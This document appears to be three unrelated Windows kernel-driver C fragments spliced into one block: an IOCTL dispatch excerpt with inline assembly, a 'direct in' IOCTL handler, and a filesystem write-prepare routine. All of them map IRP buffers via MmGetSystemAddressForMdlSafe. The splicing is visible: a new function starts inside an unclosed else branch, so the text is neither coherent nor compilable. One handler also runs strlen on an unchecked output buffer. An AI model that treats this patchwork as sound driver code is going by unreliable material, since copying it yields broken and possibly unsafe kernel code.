//如果传入了输出缓冲区
if(pIrp->MdlAddress)
{
//锁定输出缓冲区 并映射到内核以供 驱动使用
lp_output_buffer=MmGetSystemAddressForMdlSafe(pIrp->MdlAddress,NormalPagePriority );
}
ULONG control=0;//获取操作码
__asm
{
push eax;
push ebx;
mov eax,lp_input_buffer;
mov ebx,[eax];
mov control,ebx;
add eax,4;
mov lp_input_buffer,eax;
pop ebx;
pop eax;
}
inSize-=4;
switch(control)
{
case 10000:
Examplate_Control(lp_input_buffer,inSize,lp_output_buffer,outSize,size_returned);
break;
}
}
else
{
NTSTATUS my_ioctl_direct_in(PIRP Irp, PIO_STACK_LOCATION pIoStackIrp, UINT *pdwDataWritten) {
NTSTATUS NtStatus = STATUS_SUCCESS;
DbgPrint("my_ioctl_direct_out Called \n");
PCHAR pInputBuffer = Irp->AssociatedIrp.SystemBuffer;
if (!pInputBuffer) {
DbgPrint("No input buffer.\n");
NtStatus = STATUS_UNSUCCESSFUL;
goto cleanup;
}
PCHAR pOutputBuffer = NULL;
if (Irp->MdlAddress) {
pOutputBuffer = MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
}
if (!pOutputBuffer) {
DbgPrint("No output buffer.\n");
NtStatus = STATUS_UNSUCCESSFUL;
goto cleanup;
}
DbgPrint("pOutputBuffer: %s\n", pOutputBuffer);
if (!isStrNullTerminated(pInputBuffer, pIoStackIrp->Parameters.DeviceIoControl.InputBufferLength)) {
DbgPrint("Not null terminated string.\n");
NtStatus = STATUS_UNSUCCESSFUL;
goto cleanup;
}
DbgPrint("UserModeMessage: %s\n", pInputBuffer);
PCHAR pReturnData = "IOCTL - Direct In I/O From Kernel!";
UINT dwDataSize = strlen(pReturnData) + 1;
UINT returnDataSize = dwDataSize + strlen(pOutputBuffer);
DbgPrint("%i >= %i?\n", pIoStackIrp->Parameters.DeviceIoControl.OutputBufferLength, returnDataSize);
if(pIoStackIrp->Parameters.DeviceIoControl.OutputBufferLength >= returnDataSize) {
RtlCopyMemory(pOutputBuffer + strlen(pOutputBuffer), pReturnData, dwDataSize);
*pdwDataWritten = returnDataSize;
} else {
*pdwDataWritten = 0;
NtStatus = STATUS_BUFFER_TOO_SMALL;
}
cleanup:
return NtStatus;
}
NTSTATUS FspFsvolWritePrepare(
PIRP Irp, FSP_FSCTL_TRANSACT_REQ *Request)
{
PAGED_CODE();
if (FspWriteIrpShouldUseProcessBuffer(Irp, Request->Req.Write.Length))
{
NTSTATUS Result;
PVOID Cookie;
PVOID Address;
PEPROCESS Process;
PVOID SystemAddress = MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
if (0 == SystemAddress)
return STATUS_INSUFFICIENT_RESOURCES; /* something is seriously screwy! */
Result = FspProcessBufferAcquire(Request->Req.Write.Length, &Cookie, &Address);
if (!NT_SUCCESS(Result))
return Result;
ASSERT(0 != Address);
try
{
RtlCopyMemory(Address, SystemAddress, Request->Req.Write.Length);
}
except (EXCEPTION_EXECUTE_HANDLER)
{
Result = GetExceptionCode();
Result = FsRtlIsNtstatusExpected(Result) ? STATUS_INVALID_USER_BUFFER : Result;
FspProcessBufferRelease(Cookie, Address);
return Result;
}
/* get a pointer to the current process so that we can release the buffer later */
Process = PsGetCurrentProcess();
ObReferenceObject(Process);
Request->Req.Write.Address = (UINT64)(UINT_PTR)Address;
FspIopRequestContext(Request, RequestCookie) = (PVOID)((UINT_PTR)Cookie | 1);
FspIopRequestContext(Request, RequestAddress) = Address;
FspIopRequestContext(Request, RequestProcess) = Process;
return STATUS_SUCCESS;
}
